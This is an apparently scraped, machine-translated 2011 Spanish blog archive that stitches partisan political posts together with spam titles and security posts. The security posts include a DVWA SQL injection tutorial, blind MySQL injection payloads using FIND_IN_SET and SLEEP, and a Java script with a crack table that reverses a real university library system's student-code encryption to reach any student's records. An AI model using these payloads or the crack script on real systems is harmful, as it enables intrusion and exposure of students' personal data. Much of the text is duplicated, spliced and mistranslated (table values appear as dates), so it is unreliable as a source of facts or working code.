Well, here 's another video showing the procedure to elevate privileges on a Linux system by exploiting a vulnerability in the kernel. Previously obtained a shell with meterpreter.
Greetings.
Wednesday, May 4, 2011
Monday, May 2, 2011
Allnintendo Ds Repair
A murderer less.
I could have woken up today with better news than the death of Bin Laden. A terrorist who since 1988 has lead to an amalgam of autonomous groups called as Al-Qaeda (The Base), which has claimed the lives of thousands of people seeking the imposition of an Islamic theocracy in the world. A theocracy, of course, incompatible with democracy and Western freedoms. That is why we, and our western partners were their prime targets. But, somehow or other, we learned to stand up to international terrorism through a long, hard fight, but ultimately effective, get rid of this barbarian. The reader will notice that I say we, and yes, I mean all Western societies, I mean all those citizens who have always stood firm against the murderers, indoors or outdoors, and have always remained on the side of defending victims that terrorists are due. So this post is a tribute to them and especially to the victims.
http://www.youtube.com/watch?v=m225Da69DnY&feature=related
Sunday, May 1, 2011
Clear Template For Drivers License
Linux DEMO: SQL Injection Exploitation
Greetings. 
Hi, this is the demo I did for the talk I gave, a friend and I, on Saturday in the FLISOL (UNAC).
The video shows how to exploit a SQL injection to get a meterpreter session on the remote system and take control.
Greetings.
Wednesday, April 27, 2011
Saigon Love Story Watch
Tve, does the chain of all?.
many voices have been raised due to the exchange of views held between the Secretary General and the presenter Ana Pastor. Then pick the turning point of the discussion where the leader of our party responded calmly and providing ammunition to the questions and subsequent suggestions by the interviewers.
But not even stop. From NNGG Clineal believe that since the Socialists remain in power have used the manipulation of information as a weapon dedicated to perpetuate it, just as they have done many of these ideas. Here are some examples:
But do not stop there. Possibly the summum was reached in the final of the Copa del Rey to face FC Barcelona against Athletic Club Bilbao when the song of all blame for not seeing her for the part of the English an obvious reality.
From NNGG Clineal we do not accept this, and also to denounce the manipulation of TVE from here also say that you should never censor the anthem of Spain, the song of all . And since we were talking about football here has the anthem on a magical night that began at that time.
Play Pokémon Fire Red Free Online
Chat FLISOL
As you know, in the FLISOL, plus free distros install GNU / Linux, also lectures on many aspects of free software and its applications. Some of these lectures are taught by members of OSS communities but also by firms and related professionals. Well, a San Marcux (the district of which I am a member) was invited to participate in the FLISOL (based UNAC) so we came to give a talk.
Greetings. 
Then a friend suggested I talk about an issue of (in) computer security and since there was no such excuse (I have every Saturday off) I could be of injections SQL. He, meanwhile, planned to talk about social engineering and do some demos with SET (Social Engineering Toolkit). At the end we agreed to talk about two things and we put as a name to talk "2 organizations attack vectors." We
scheduled for Saturday at 10:45 in the Auditorium 1. So if you have time, I invite you to give you a turn around and maybe learn something interesting. For my part, I will not go too much (not enough time) but I'll do a demo on how to operate a SQLi to access the system.
I'll be honest, it will be the first time that a lecture or similar. So I just hope everything goes well, that democracy fails and I can understand.
Greetings.
Monday, April 25, 2011
Katies Playgrounds Feet
GREAT SPEECHES IN HISTORY Che Guevara VI
PART V PART IV PART III PART II PART I
VISIT www.nnggclineal.org 
Again, as usual in our newsroom, we bring the section of the "Great Speeches in History." For this entry, we selected speeches of three major figures, Robert Kennedy, John Paul II and Mariano Rajoy.
These figures have been of great significance in the historical moment in which they lived and others, like Mariano Rajoy, it will be very soon.
hope PART V PART IV PART III PART II PART I
VISIT www.nnggclineal.org
Friday, April 22, 2011
Windowblinds 7 Without Changing Sid
MURDERER MURDERER!
For years Socialist propaganda has developed an idyllic and concerned about the poorest of Che Guevara. Nothing could be further from reality.
VISIT www.nnggclineal.org 
Ernesto Guevara was an Argentinian who studied medicine but never got a degree in that science, America soon marched fighting capitalism imposed by the "U.S. empire" but, what was your fight?
Che's struggle was to crush anything that smelled of "capitalism", gave the same methods and the consequences, thanks to the character of the Cuban people now enjoying its idyllic democracy and thousands of people have been unable to meet her parents and grandparents, executed at the hands of the savage.
Che was delighted to be bloodthirsty killing people, showing no kind of compassion, and those who did not die against a wall just were submitted under the yoke of communism.
VISIT www.nnggclineal.org
Thursday, April 21, 2011
How To Make A Drag Suit
laughter! 2011 Easter
VISIT www.nnggclineal.org 
We release this new comic section On the blog I'll bring you from time to time, in life there are many important things, and one of those things is to laugh. We hope you laugh a lot and propongáis more funny videos.
VISIT www.nnggclineal.org
Why Positive Earth Tractor
If lately you've been considering settle any distro of Linux and free software to change you but still do not dare to take the plunge, here's your chance. The next April 30 will be held on "FLISOL" (Festival of Latin American Free Software Installation).
The FLISOL is an international event for the dissemination of free software that has been conducted every year since 2005. Is carried out in parallel in many cities around the world where those responsible for their organization are the various OSS communities in each locality.
FLISOL In many enthusiasts are GNU / Linux and SL in general distros to install and set free in the equipment bearing the audience. All, of course, completely free and legal.
addition to settle the distro of your choice on the FLISOL also held lectures, presentations and workshops around the SL and its philosophy in its different forms of expression: artistic, academic, business and social.
This time the community " UNACINUX" National University of Callao will be responsible for organizing the headquarters FLISOL Callao. You can find more information by visiting their website:
http://csl.unac.edu.pe/flisol2011/
addition to Callao, Peru will host 17 other sites more distributed in different cities of our country. POSE consult the list of sites for Peru (and other countries too) on the official website of FLISOL:
http://flisol.net/
No excuse, are all invited to FLISOL. There we shall see.
A greeting.
Sympathy For Victor Frankenstein In Frankenstein
another year, as tradition in Spain, the streets of our towns and cities smell of incense and stained red color off the rose petals thrown by the faithful. Our country is a living example of that old traditions are still counting the popular clamor, because regardless of the beliefs of each person during these rainy days we see in the eyes of our neighbors that feeling peace and reconciliation.
processions, like Christianity, are part of Spain's identity without which we would understand its history, let alone its people. As much as he though some, in Spain there are things like never disappear, the bulls go, stop by mass, flamenco dancing, a nap and after lunch cigarette, among other things. We are proud of our customs, we are proud of being, feeling and believing in SPAIN.
VISIT www.nnggclineal.org 
Sunday, April 17, 2011
Brazilian Wax Cam Peep
New Generations: Being, Feeling, Freedom Extender. Weekly review special. Contrasts
NNGG Ciudad Lineal just returned from the wonderful journey we have made to Aragon and Catalonia, with the excuse of the National Congress NNGG 13 so we could not publish in the normal way on the blog, but here are the views of the fantastic experience of Congress. Throughout the days of Congress hundreds of young people from all over the country so dear, we met in town dedicated to finding solutions the problems of the future of this country in an atmosphere of friendship, closeness and dialogue commendable. You gave an important event in their own NNGG, changing the current president of the Jury Beatriz Cordoba.
In these days, besides the choice of Beatriz Jurado, we can try a few lines to condense what was discussed and debated there. NNGG reaffirmed its support for individual freedom, the possibility that people live free and not be subjected by reason of grand promises mean stupid or similar to those we are accustomed to the government of our country. And we believe this because we believe that people know how to choose, you do not need anyone to say that citizens have to do is, we believe that real progress is when there is freedom, not by rigid labor market, "crunching" to tax the citizens so. Another idea was validated was the need for finding solutions to ensure the viability autonomous. Administrations do not want overlap, we do not want barriers to free movement of people in every way, we do not, in short, based on a grandiose idea of \u200b\u200ba region can end the freedom of an entire country. And this was the line of proposals, based on the pursuit of freedom.
NNGG Ciudad Lineal just returned from the wonderful journey we have made to Aragon and Catalonia, with the excuse of the National Congress NNGG 13 so we could not publish in the normal way on the blog, but here are the views of the fantastic experience of Congress. Throughout the days of Congress hundreds of young people from all over the country so dear, we met in town dedicated to finding solutions the problems of the future of this country in an atmosphere of friendship, closeness and dialogue commendable. You gave an important event in their own NNGG, changing the current president of the Jury Beatriz Cordoba.
In these days, besides the choice of Beatriz Jurado, we can try a few lines to condense what was discussed and debated there. NNGG reaffirmed its support for individual freedom, the possibility that people live free and not be subjected by reason of grand promises mean stupid or similar to those we are accustomed to the government of our country. And we believe this because we believe that people know how to choose, you do not need anyone to say that citizens have to do is, we believe that real progress is when there is freedom, not by rigid labor market, "crunching" to tax the citizens so. Another idea was validated was the need for finding solutions to ensure the viability autonomous. Administrations do not want overlap, we do not want barriers to free movement of people in every way, we do not, in short, based on a grandiose idea of \u200b\u200ba region can end the freedom of an entire country. And this was the line of proposals, based on the pursuit of freedom.
And that's what beating after NNGG, what we are, what we feel and what we want to extend.
VISIT www.nnggclineal.org
VISIT www.nnggclineal.org
Saturday, April 16, 2011
Found A Lump At The End On My Anus
been a few days of April 14, the date on which live in the past returned to vindicate the English look to the past and not the future. Coincidentally, Ciudad Lineal NNGG Zaragoza was in these days and because of that we come to visit Belchite the Aragonese town, where people fought one of the most terrible battles of the Civil War, a wound that still festers in the public conscience.
Belchite The modern village is typical of many that exist in Spain, with its locals and scenic spots. But with modern homes watched some collapsed buildings, a wasteland of rubble that represented the ultimate representation of the failures of a generation, an entire society, English 31. A society that after a dictatorship of Miguel Primo de Rivera was unable to channel their feelings in the creation of a functioning democracy, a modern democracy as we currently have and that was the result of a society that if you knew channel their efforts in 78. 
see the contrast between the two cases, the contrast between the constitutional monarchy and the Republic have now failed and anarchy which is vindicated by irresponsible and radicals who seek to take risks and crush the system of freedom we live to promote "something" not quite know it is.
But we have been witnessing what occurs irresponsibility, without regard for the desires, hatred and confrontation, producing a People who once was the jewel of the region was ravaged by the confrontation between brothers.
VISIT www.nnggclineal.org
VISIT www.nnggclineal.org
Monday, April 11, 2011
Diazepam How Long To Work
"Prudence, common sense and know prioritize" Weekly review
Prudence, common sense and learn to prioritize, these are simple words with which the PP in Madrid has marked the limits of the actions proposed in our manifesto for the council by the hand of our mayor, Alberto Ruiz Gallardon. In the parking crisis is chosen large investments have thus looking for some accounts healthy as possible with no impact on the most vulnerable part of the income-expenditure equation, the citizen's pocket. The future of Madrid in the coming years does not pass through the great works but from the Ruiz-Gallardon team considered that it is time to plan.
propose a new General Plan, a reform of the administration to streamline and make it more efficient. Intensify the use of the facilities that already have, extending their hours, giving more weight in many cases private initiative so as to get "provide the best service at the lowest cost."
And the cost is one of the key points, the crisis affects everyone's pocket and we can not separate the government from citizens and that some are a "macrobolsillo" of others. Consequently, this clause in belt-tightening and now reap what you sow so hard cost. Entroncaría is where the idea of \u200b\u200bnot raising taxes, checking to make property tax proportional to the economic capacity of the owner.
finally say that the Mayor's team is doing an excellent job of introducing among its proposals the wishes of the people who have sent proposals to the official website at a rate of 2000 proposed a week at its peak . And all of these proposals seems the most recurrent theme is to improve the road network to increase bicycle use and cleaning the streets, so that calls for combat graffiti etc. These are briefly the proposals of the next Mayor of the City of Madrid, Alberto Ruiz Gallardon.
Sunday, April 10, 2011
Boston Whaler Restorers
4. Again
seems that the sun has finally arrived and now if you to stay. Members of New Generation Ciudad Lineal've had a busy week with events, event etc and every day has been with us a radiant sun.
seems that the sun has finally arrived and now if you to stay. Members of New Generation Ciudad Lineal've had a busy week with events, event etc and every day has been with us a radiant sun.
Nationally we have seen how the public increasingly is showing signs of fatigue lying government and all it represents. Saturday's demonstration was the representation that Spain wants to end citizenship ETA, but not giving concessions but rather differentiating between winners and losers and saying it very clear to ETA they have lost. And the political landscape of the week to come to accounts of this event. Outline here duplicity and disrespect from the Journal of the Prisa Group became the event, having the face to say that the demonstration was an act of support for the government and acknowledgments to its terrorist policy ... In another vein we can see sovereigntists consultations in Catalonia have been organized by the always have again failed to demonstrate that the public is not interested in independence and confrontational speech but rather that you are looking to work and lead a happy life.
On the international scene it seems that the dust has to be calm. Japan has returned to calm. Libya is still in its civil war modulated by giving support to rebel allies while in Africa it appeared that the polls will finally succeed in choosing presidents d them under the "protection" is giving France the democratic game. And looking at Latin America look at the elections in Peru. These will ultimately decide if another country brother falls in the Bolivarian socialist network or rather slams door on these outdated ideas and commitment to the future only liberalism and democracy can guarantee.
Saturday, April 9, 2011
Holtek Ht27c512-70 Descargar Driver
FLISOL 2011 SCU Resolved encryption
Hello again ... may recall that half last year found an error on the website of the SCU (System Control Register) of the library. That mistake allowed to query and modify data that would come printed on the library card of any student of the university (and as we change your sex PoC Solomon xD).
Another interesting observation is that if encryption code grouped in pairs, the first digit of each pair never varies. Example:
A greeting.
capture showing how to compile and use the script.
The error was reported and corrected weeks later. But the solution not convinced me at all and was only encrypt the variable that was causing problems. That does not solve the cause of the error itself but its operation more difficult.
Since then the challenge was proposed cryptographic SCU. If we could Find out how to put the code of the students could continue to access information from any of them. Recently we started this and we succeeded.
superficially In this post I will explain the analysis that led us to solve the encryption SCU.
Well as you know the codes of the students consist of 8 digits can be grouped as follows: The first 2 represent the year of entry, the following 3 are the source of the power to which it belongs and the last 3 used as sequential serial number.
Furthermore encrypted codes are 16 digits, eg "A55E33BE219A8420" corresponding to "08200090" . Furthermore, in the characters used, see numbers and letters as "A" , "B" and "E" . Which suggests a hexadecimal representation. So we can make a correspondence between each digit of the code with a couple of digits of the encrypted code. But this correspondence varies with position, ie we are talking about some sort of multiple substitution cipher.
Another interesting observation is that if encryption code grouped in pairs, the first digit of each pair never varies. Example:
08200090 -> A 5 E 5 3 3 B E 2 1 8 9 A 4 2 1
07202013 - > A 5 1 5 3 3 B E 2 3 8 9 A C 2 2
06114132 -> A 5 5 3 0 0 B 2 F 5 B 8 9 E 2 3
Moreover, it appears, each pair is independent of the other and must have its own board replacement. I say that if you look, the first digit "0" sample code is always represented by "A5" or also the third digit "2" of the first two codes is always represented by "33" .
Well, knowing this and the last three pairs should be under the corresponding order number given to me to try replacing the last digit with values \u200b\u200bfrom 0 to F. I got the following substitution table: DIGIT CODED
0 21
January 1920 February 1923 March 1922
April 1925 May 1924 June 1927
July 1926 August 1929 September 1928
is incredibly simple. They just did an exchange of positions two to two
xD Then I tried with the penultimate digit in the same way and got the replacement table: DIGIT CODED
0 8C 8D
1 2 3 8E 8F
April 1989 May 1988
6 7 8A 8B
August 1985 September 1984
Here also observed a pattern of exchange but a little trickier. This is obtained as:
0 1 -> 1 5 -> 5 D
1 0 -> 0 4 -> 4 C
2 3 -> 3 7 ; -> 7 F
3 2 -> 2 6 -> 6 ; E
4 5 -> 5 1 -> 1 9
5 4 -> 4 0 -> 0 8
6 7 -> 7 3 -> 3 B
6 7 -> 6 2 -> 2 A
8 9 -> 9 D -> D ; 5
8 9 -> 8 C -> C 4
A B -> B E -> E 7
B A -> A F -> F 6
C D -> D 9 -> 9 1
C D -> C 8 -> 8 0
E F -> F B -> B 3
F E -> E A -> A 2
Here are 3 exchanges. First is exchanged every two to two digits. Then groups of four, swapping two and two groups. Finally, group of eight digits and is exchanged.
Well, I think until now we have a pretty good idea of \u200b\u200bwhat is being done. For each digit of the code there is a different number of grouping exchanges in different ways and that's it.
There must also say that encrypt exchanges by two to two and grouping by powers of 2 leads to reflection on encryption, that is, if a digit "X" is coded as "Y" , then "Y" is coded as "X" . This property was very useful to collect more data.
The procedure, then, for each digit was to get some maps, then apply reflection to duplicate the information and finally infer the exchanges and groupings should be made for that digit.
Finally I will leave a script that I programmed in Java that calculates the encryption of code that is passed as parameter. Public class
SCUCrypt {private static final String [] [] = {
crack_table {"A5", "A4", "A7", "A6", "A1", "A0", "A3" "A2", "AD", "AC"}, {
"56", "57", "54", "55", "52", "53", "50", "51", "5E" , "5F"}, {
"31", "30", "33", "32", "35", "34", "37", "36", "39", "38"},
{"BE", "BF", "BC", "BD", "BA", "BB", "B8", "B9", "B6" "B7"}, {
"21", "20 "," 23 " "22", "25", "24", "27", "26", "29", "28"},
{"9A", "9B", "98", "99", "9E", "9F", "9C", "9D", "92", "93"},
{"8D", "8C", "8F", "8E", "89", "88", "8B", "8A", "85", "84"},
{"21", "20", "23", "22", "25", "24", "27", "26", "29", "28"}
};
public static String hashcode(String code) throws IllegalArgumentException {
if (code.length() > 8) {
throw new IllegalArgumentException();
} else {
String hashcode = "";
for (int i = 0; i < code.length(); i++) {
try {
int index = Integer.parseInt(code.substring(i, i + 1));
hashcode += crack_table[i][index];
} catch (Exception e) {
throw new IllegalArgumentException();
}
}
return hashcode;
}
}
public static void main(String[] args) {
if (args.length < 1) {
System.out.println("SCUCrypt 1.0 ( http://alguienenlafisi.blogspot.com ) ");
System.out.println (" Author: One ");
System.out.println (" Usage: java SCUCrypt {code1 [code2 [code3 ...]]}");
System. out.println ("Example: java SCUCrypt 03200254);
System.out.println (" Enjoy! }:]");
} else {for (String code: args) {try {
String hashcode = hashcode (code);
("[+] System.out.println "+ code +" -> "+ hashcode);
} catch (Exception e) {System.out.println ("[-]
ERROR. "+ Code +" is not a valid code. ");
}} System.out.println
("[+] Done.");
}}}
A greeting.
Update: I leave
capture showing how to compile and use the script.
 |
| Fig. 1 - Using SCUCrypt. |
Monday, April 4, 2011
How Many Calories Are In 1 Shrimp
"green shoots". Weekly review
Another month come the unemployment data and another month of harsh reality contradicts the statements of our government on recovery etc nearby. In fact, on 9 March was the last time I talk about recovery ZP Congress and the data again refute what he said. And it's even more insulting when we observed since July 2010 is not creating jobs in Spain and as our country is the only one with an unemployment rate above 20%. In addition we also see how the data are similar to last year when the then Department of Employment, Maravillas Rojo, argued that the recovery began ... we see that for socialists the recovery that is what the rest of the population that we see is a generation that is being burned by the lack of opportunities.
could go on giving information and demonstrating the stubborn reality, but it would be more than restate the same thing over and over again without getting anywhere again. The famous "green shoots" have long dried up, if it ever got born and that is that the seeds planted by the socialists were bad and that the public no longer believes a lying government. The PSOE opted for spending expansionary economic measures which were not only inappropriate for the time we lived (used to grow the economy in times of prosperity) but also were as stupid (Plan E) that did not meet stimulate the economy as only temporary patch served as trying to go against the reality and macroeconomic data.
few days ago I read a report on Iceland weathered the crisis despite dramatic fashion in which the affection was by barely speaking from nowhere in its economy. Adam Smith was the first person to talk about the invisible hand in the economy, an idea which argues that the market regulates itself. And if you look at the English economy will see that the most important problem is the national debt, problems with the capitalization of the boxes, etc. All situations where we perceive the government's hand.
is short for the PP to return to government for eight years to become a mere parenthesis in the period of progress began Aznar governments. Hopefully not too late when that time comes and a generation of young workers is not lost.
Sunday, April 3, 2011
My Daughter Is Experincing Discharge
FIND_IN_SET: Optimized Blind MySQL Injection Data Retrieval Web SQL Injection Attacks
'1'
Why Now this technique is more efficient? The answer is that the number of queries to infer a binary sequence equals the number of bits of that sequence. As we know, a character needs 8 bits to be represented, ie 8 queries needed to derive a character. On the other hand a position, or a numeric value can be represented with fewer bits and thus fewer visits were needed. Let's see:
So in order to obtain the binary string that represents the position will require many queries as bits containing that string.
Maybe now you're wondering -
, `, \\ \\, ,')), 1,1)) = @ a AND IF (@ to! ='',A, SLEEP (4)));
, calculate the position of that character in the set with
BIN ()
and therefore should be given as a condition. A former condition makes a conjunction with the result
The result was "10010"
set characters according to their frequency in a given language. The most frequent first and less common at the end.
injection, for that matter, I could take this form:
http://sourceforge .net/projects/dvwa/files/DVWA-1.0.7.zip/download
As in the first part shows how to install XAMPP I'll assume you already have on your machine. If not, take a look here:
well (need root privileges): # unzip
DVWA-1.0.7.zip-d / opt / lampp / htdocs / Now we need to set the parameters for DVWA can access the database.
open the file / opt / lampp / htdocs / dvwa / config / config.inc.php
You only need to set the password for mysql root user in the variable $ _DVWA
We click on "here". Charged another page which displays a button to create the database DVWA. I do click.
Username = admin Password = password
Fig. 3 - DVWA main page. I have highlighted in green different vulnerabilities with which we practice. Below is highlighted with yellow menu to change the difficulty of DVWA. DVWA allows 3 levels of difficulty: low, medium and high. The default is high so you should switch to low.
Excellent, this means that we can alter the SQL query syntax. We will do another test, tautology now to confirm this. Place:
6.1 Obtaining the number of selected fields
ORDER BY
. But how can we know without having the source code?
Sometimes it is sufficient to generate a syntax error to see the entire SQL query and then get the number of selected fields, but not always. The most common is that the syntax error show only a small part of the consultation and we do not see how many fields are selected.
An alternative way to use ORDER BY is not giving the name of the field but her position. Thus:
Position 3 does not exist because only selected 2 fields. Therefore, this query will generate an error like this:
Unknown column '3 'in' order clause '
Then, to determine the number of selected fields, the idea is to inject an ORDER BY and be ordered by the first field, then the second and so incrementally to generate an error. When that happens we will know how many fields are selected in the query.
The consultation was not error. That means there are 10 or more fields and still not have an upper limit. Now twice ordered by N. In this case 20. CONSULTATION RESPONSE
select 1,2,3,4,5,6,7,8,9,10,11 DEDUCTION ORDER BY 15; ERROR There are fewer than 15. Upper limit = 15
If there are 11 or older and under 12, by simple deduction are selecting 11 fields. If we used the technique of incremental system would have been necessary 12 queries but with the binary search technique were necessary only 5 (less than half). I hope that this example is understood the binary search technique and to help us save time and is used by many farm tools automated. 6.1.2
Now let's do the DVWA. The injection technique using the incremental system, would be: ANSWER INJECTION
'order by 3 # Unknown column '3' in 'order clause '
Fig. 7 - Error ORDER BY.
6.2 Data Extraction with UNION SELECT
The union of the queries above selected data users with id 1 and 2.
Although in the above example is being selected in both queries the same fields of the same table, this really is not necessary. The only mandatory requirement is that both queries have the same number of fields, otherwise, these fields might be constant, function results, columns from different tables or different databases.
to make our own queries to the database and extract the information you want. 6.2.1
The first injection with UNION SELECT will be to see which fields are displayed on the website. This can be achieved as follows:
The consultation will come to the database would look like: SELECT first_name, last_name FROM users WHERE user_id =''AND 1 = 0 UNION SELECT 1.2 # ';
As
"Surname" respectively. This means that the two fields in the query are visible. Sometimes only show a few.
and version ()
return the user to the database and MySQL respectively. Another interesting feature is
A greeting and goodbye.
Today Blog reading "Security By Default" I heard another optimization exploiting data mining injections Blind SQL in MySQL. I say it because, as you may recall, recently talked about the Bit Shifting, a technique that has the same purpose.
So in this post I will explain what I understand of this new technique which I believe provides a significant improvement in efficiency.
FIND_IN_SET, is actually a MySQL function that returns the position of a character within a set. For example:
mysql> SELECT FIND_IN_SET ('e', 'a, e, i, o, u');
+-------------------------------+ in our partnership with
FIND_IN_SET ()
. The next step is to get the binary string representation of each position. This can be achieved with BIN
function ()
. Finally segmented binary string into individual characters, these can only be
'0 'or '1'
, representing the false or true response respectively. Thus we can deduce the binary string of the position and therefore the character.
Fig. 1 - Technical FIND_IN_SET.
# BITS BINARY DECIMAL  a 0-1 0-1 February 2 to March 10 - 11 | 4 to 7 March 100 to 111
| 6 from 1932 to 1963 100000 to 111111 | 7 64 to 127 1000000 to 1111111
So in order to obtain the binary string that represents the position will require many queries as bits containing that string.
Maybe now you're wondering -
unless we know the position then we do not know how many bits you know how many inquiries do?, 2,3,4,5,6,7,8 , 9 ,_,!,@,#,$,%,^,&,*,(,),-,+,=, \\ ,,.,", \\ ', ~
- It's simple, we can not know. So we must continue asking queries until the next character of the binary string we throw an empty string (''). That is the condition that signals the end of the consultations and we express it somehow. The author proposes two ways: generating an error or delay by adding a (Delayed response). Now that this mechanism needs further consultation, which tells us when we're done. Therefore, the total of consultations will be one more than the number of bits of the position.
All that said, let's see an example of this technique.
SELECT ((SELECT @ a: = MID (BIN (FIND_IN_SET (MID (USER (), 1.1),
'a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z, 0.1
, `, \\ \\, ,')), 1,1)) = @ a AND IF (@ to! ='',A, SLEEP (4)));
The example gets the name of MySQL user with USER () , then take the first character of name
MID () , calculate the position of that character in the set with
FIND_IN_SET ()
, you get the binary string representation of that position with BIN ()
, take the first character of the binary string, again with MID (), and assigned to a variable
"@ a"
. All this within a SELECT
which only serves to initialize the variable @ a. The result of that compared with SELECT @ a, should be noted that this will always true, is like comparing "@ a = @ a". This is done because the injection is in WHERE clause
and therefore should be given as a condition. A former condition makes a conjunction with the result
function IF () after verifying that @ is not an empty string. If this condition is met the result will be @ a (which is 0 or 1, that is false or true) and if not execute a delay of 4 seconds. complicated enough explanation, let's see how it works: mysql> SELECT ((SELECT @ a: = MID (BIN (FIND_IN_SET (MID (USER (), 1.1), 'a,b, c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_ ,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\, ,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\, ,')),3,1)) =@a AND IF(@a!='',@a,SLEEP(4))); +-----------+ +-----------+ row in set (4.00 sec)
The result was "10010"
which corresponds to the eighteenth position. The last 0 is not considered that corresponds to the query that caused the delay of 4 seconds. If we look at our whole
character "r"
is occupying the position 18 and the first letter of the user (root @ localhost). Using this technique we have deduced a character with only 6 visits, more efficient than Binary Search and Bit Shifting requiring 8 queries.
Figure 2 - Comparison of efficiency.
Some problems
There is a problem using FIND_IN_SET function () and is not case sensitive. Therefore, if the whole had a
'a'
in the first position and a
'A'
in the twenty-seventh, each time you inquire for 'a' or 'A' will return the first match, in this case 1. Because of this feature we will have a very significant loss of accuracy when information is needed to extract structures are names or passwords.
Another drawback is that if we consider a set of characters from broad enough from position 64 to 127 and no improvement from 128 to 255 will require 9 queries, ie, less efficient than previous methods. If we consider the extended ASCII set could say it only provides efficiency for a quarter of the cases.
Finally the fact of including a delay to distinguish the end of the consultations will this method reduces the efficiency, ultimately, the aim is to save time.
Some solutions
to fix what the "case sensitive"
occurred to me
use INSTR function ()
that returns the position of the first coincidence of a string within another. This function is case-sensitive only when one of its parameters is a string of type BINARY
. For example:
mysql> SELECT INSTR ('aA', CAST ('a' AS BINARY));
+----------------------- -----------+
, 1,1)) = @ a AND IF (@ to! ='',A, SLEEP (4)));
To overcome the second problem there are some optimizations that can be implemented:
reduce as much as possible the set. For example removing unprintable characters and extended ASCII strange symbols. We would be approximately half. Sort
set characters according to their frequency in a given language. The most frequent first and less common at the end.
An interesting observation is that the first query always throw 1 except that the search character is not in the set. Knowing this we can avoid the first consultation and start the second. If the second query runs the new delay would do the first, otherwise we can infer that the outcome of the first was 1. Would save a query.
For the third problem of this technique, the author proposes a case which could be resolved. This is when different pages are displayed according to a parameter (/ page.php? Id = 0, / page.php? Id = 1) In this case we use 3 different pages to represent the 0, 1 and the final consultations. IF (@ a: = MID (BIN (FIND_IN_SET (MID (USER (), 1.1), 'a, b, c, d, e , f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z, 0,1,2,3,4,5,6,7,8,9, _,! ,@,#,$,%,^,&,*,(,),-,+  , =, \\ ,,.,", \\',~,`, \\ \\ , is vulnerable to SQL injections. What you learn in this and the following parts of the series are some techniques to exploit these vulnerabilities. By "explode" I mean to compromise the security of the organization either by obtaining privileged information or access. |
| But first let's ride a vulnerable environment in which to practice. Damn Vulnerable will use Web App (DVWA), this is a vulnerable web application that will allow us to intentionally practice and learn about web vulnerabilities without getting into trouble with the law xD |
http://sourceforge .net/projects/dvwa/files/DVWA-1.0.7.zip/download
As in the first part shows how to install XAMPP I'll assume you already have on your machine. If not, take a look here:
http://alguienenlafisi.blogspot.com/2011/01/sql-injection-web-attacks-parte-i.html
The file downloaded is a zip . Extract its contents into the directory / opt / lampp / htdocs
well (need root privileges): # unzip
DVWA-1.0.7.zip-d / opt / lampp / htdocs / Now we need to set the parameters for DVWA can access the database.
open the file / opt / lampp / htdocs / dvwa / config / config.inc.php
# gedit / opt / lampp / htdocs / dvwa / config / config.inc.php
You only need to set the password for mysql root user in the variable $ _DVWA
$ _DVWA ['DB_PASSWORD'] = 'rootpassword', / / here put the root password of
['DB_PASSWORD']
\u0026lt;? php
# Database management system to use
$ DBMS = 'MySQL';
# $ DBMS = 'PGSQL';
# Database variables $ _DVWA = array ();
$ _DVWA [ 'db_server'] = 'localhost';
$ _DVWA ['db_database'] = 'dvwa';
$ _DVWA ['db_user'] = 'root';
# Only Needed for PGSQL $ _DVWA ['db_port'] = '5432 '; ?> Then if we are not running the xampp we start with:
# / opt / lampp / lampp start
now our browser http://localhost/dvwa
we see something like this:
We click on "here". Charged another page which displays a button to create the database DVWA. I do click.
- Fig. 2 - a button to create the database.
- So far we have finished installing DVWA.
- Click "Logout" and login with these details:
'll see a page like this:
Fig. 3 - DVWA main page.
Our environment is now ready for practice. Continue ...
6 Removing data
start learning some techniques for data extraction. To do this select the vulnerability "SQL Injection" (at low level). Display a search form on "Go" user where, for example, if you place 1 will show the details of the user "admin".
Fig. 4 - SQL Injection Vulnerability.
Well ... do a simple test to verify that the form is vulnerable to SQLi. We put a single quote (') and give a "Submit." You see an error message like this:
You Have an error in your SQL syntax; check the manual That corresponds to your MySQL server version for the right syntax to use near''''' at line 1
Excellent, this means that we can alter the SQL query syntax. We will do another test, tautology now to confirm this. Place:
'or''='
 |
| If you are not understanding very well, maybe it will help review the source code of the application. To do this you must click on the button |
ORDER BY
The first step to exploit a vulnerability in SQL is to identify how many fields are being selected in the query. For example, if you've seen the source code, you will see that the query is something like:  SELECT first_name, last_name FROM users WHERE user_id = '1 '; |
| As you'll see two fields are being selected: |
There is another method using the ORDER BY clause . This clause allows us to sort query results according to any of the selected fields. For example:
SELECT first_name, last_name ORDER BY first_name FROM users
The above query response ordered by the "first_name".
SELECT first_name, last_name FROM users ORDER BY 1  | This also refers to other sorts results by field "first_name" and that is what appears in the first place. But what happens if you try to sort out a position that does not exist? For example:
| SELECT first_name, last_name FROM users ORDER BY 3 |
Unknown column '3 'in' order clause '
Then, to determine the number of selected fields, the idea is to inject an ORDER BY and be ordered by the first field, then the second and so incrementally to generate an error. When that happens we will know how many fields are selected in the query.
This may work, but is inefficient. What I actually used a binary search technique (Binary Search). This technique consists in taking an arbitrary value N and make an inquiry ordered by this value. There are two possible answers: boot error boot error or not. If an error occurs we deduce that the number of selected fields is less than N we take. And if there is no error in the query, we deduce that the number of fields is equal to or greater than N. In the first case we have already established a range where the desired number (from 1 to N) but in the second, we only set a lower limit (N to more). To have an upper limit in the second case simply refer back to this time ordering double N and depending on the response, there is error or no error, we will set an upper limit (N to 2N) or a new lower bound (2N to high) respectively. Repeat the above operation to have a well-defined interval, with lower and upper bound. Once we have determined the range proceed to find its middle element, it can be defined as the integer quotient of the sum of lower and upper limit by two. Then sorted by the middle element and depending on the response we will take the upper or lower half of the interval as the new interval and the middle element as the new upper or lower limit respectively. Continue dividing the interval each time by half to deduce the number of columns. The consultation was not error. That means there are 10 or more fields and still not have an upper limit. Now twice ordered by N. In this case 20. CONSULTATION RESPONSE
select 1,2,3,4,5,6,7,8,9,10,11 DEDUCTION ORDER BY 20; ERROR There are fewer than 20. Upper limit = 20
already have a defined interval upper limit (20) and bottom (10). Now we seek the middle element: (10 +20) / 2 = 15 and ordered by this value. CONSULTATION RESPONSE
select 1,2,3,4,5,6,7,8,9,10,11 DEDUCTION ORDER BY 15; ERROR There are fewer than 15. Upper limit = 15
